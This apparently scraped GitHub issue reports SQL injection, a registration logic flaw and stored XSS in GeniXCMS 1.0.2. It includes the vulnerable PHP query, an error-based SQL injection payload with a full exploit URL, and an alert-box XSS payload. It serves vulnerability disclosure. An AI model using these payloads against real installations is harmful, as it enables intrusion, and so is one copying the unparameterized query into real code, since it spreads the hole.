$sql = sprintf("DELETE FROM `menus` WHERE `menuid` = '%s' ", $_GET['menuid']);
Db::query($sql);
Go http://localhost/gxadmin/index.php?page=menus , find a menus and click del button. Change the position of menuid and token, change menuid into : menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'
So i can register a new user with email in id1 by using register.php?act=edit&id=1
XSS
Register a user and reply to an post with XSS payload, eg: <script>alert(2)</script>
When the administrator into the background to view this comment, and move the mouse up, XSS will take effect.
The text was updated successfully, but these errors were encountered:
Hecbi
changed the title
SQL Injection in version 1.0.2
SQL Injection and a bug in version 1.0.2
Apr 26, 2017
Hecbi
changed the title
SQL Injection and a bug in version 1.0.2
SQL Injection & Mailbox validation logic vulnerabilities & XSS 1.0.2
Apr 26, 2017
SQL Injection
I find a SQL injection at /inc/lib/Control/Backend/menus.control.php
https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Control/Backend/menus.control.php line 247
Go http://localhost/gxadmin/index.php?page=menus , find a menus and click del button. Change the position of menuid and token, change menuid into :
menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'exp:
/CMS/GeniXCMS-master/gxadmin/index.php?page=menus&token=eMEfQ9xolysmPbu6Ru1EP13Okkqt0A7FeDO8vjCWo1rpshooHHNy9DsCEqV1qtk3poFGcqkhiR0xxKyv&act=remove&menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'Don't forget to get a active csrftoken.
Mailbox validation logic vulnerabilities
And there is another vulnerability in register.php line 56
https://github.com/semplon/GeniXCMS/blob/master/register.php
So i can register a new user with email in id1 by using
register.php?act=edit&id=1XSS
Register a user and reply to an post with XSS payload, eg: <script>alert(2)</script>

When the administrator into the background to view this comment, and move the mouse up, XSS will take effect.
The text was updated successfully, but these errors were encountered: